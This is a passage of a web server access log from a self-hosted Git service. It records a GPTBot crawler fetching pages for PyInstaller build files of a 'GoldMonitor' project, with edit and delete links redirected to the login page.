GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9835] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:38:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:38:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:38:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11143] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:18:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11142] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:18:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11142] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:18:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 9823] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:18:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 9824] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:18:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 9825] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:18:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:18:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:18:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9825] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:18:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9825] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:18:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9825] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:18:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:18:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:18:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:18:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:18:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:18:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr 